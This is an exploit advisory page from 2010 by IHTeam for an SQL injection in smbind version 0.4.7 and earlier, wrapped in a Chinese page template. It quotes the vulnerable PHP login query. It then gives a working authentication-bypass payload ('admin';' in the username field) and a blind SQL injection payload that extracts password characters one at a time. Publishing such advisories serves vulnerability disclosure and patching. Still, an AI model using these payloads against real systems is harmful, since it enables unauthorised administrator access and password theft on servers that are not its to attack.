扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
############################################################################################## # # smbind <= v.0.4.7 Sql Injection # Site: https://sourceforge.net/projects/smbind/files/ # Reported on 28/08/2010 # # Author: IHTeam # ############################################################################################## # # Buggy code: # if(isset($_POST['username']) && isset($_POST['password'])) { if((!filter("alphanum", $_POST['username'])) or (!filter("alphanum", $_POST['password']))) { die("Username and password must contain only letters and numbers."); } $_SESSION['username'] = $_POST['username']; $_SESSION['password'] = $_POST['password']; } if(isset($_SESSION['username']) && isset($_SESSION['password'])) { $res = $dbconnect->query("SELECT ID FROM users WHERE username = '" . $_SESSION['username'] ."' AND password = '" . md5($_SESSION['password']) . " ' "); # ############################################################################################## # # Easy admin login # # Enter in username field: admin'; # # Enter in password field: [anything] # # Sql query will result like this: SELECT ID FROM users WHERE username = 'admin'; #' AND password = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' # ############################################################################################## # # Limitation and Blind Sql Injection # # You're able to make blind sql injection too. Just input in username field something like this: # admin' AND SUBSTRING(password,1,1)=char(49); # # # That sql injection work only with magic_quote_gpc = Off # ############################################################################################## |
体验盒子
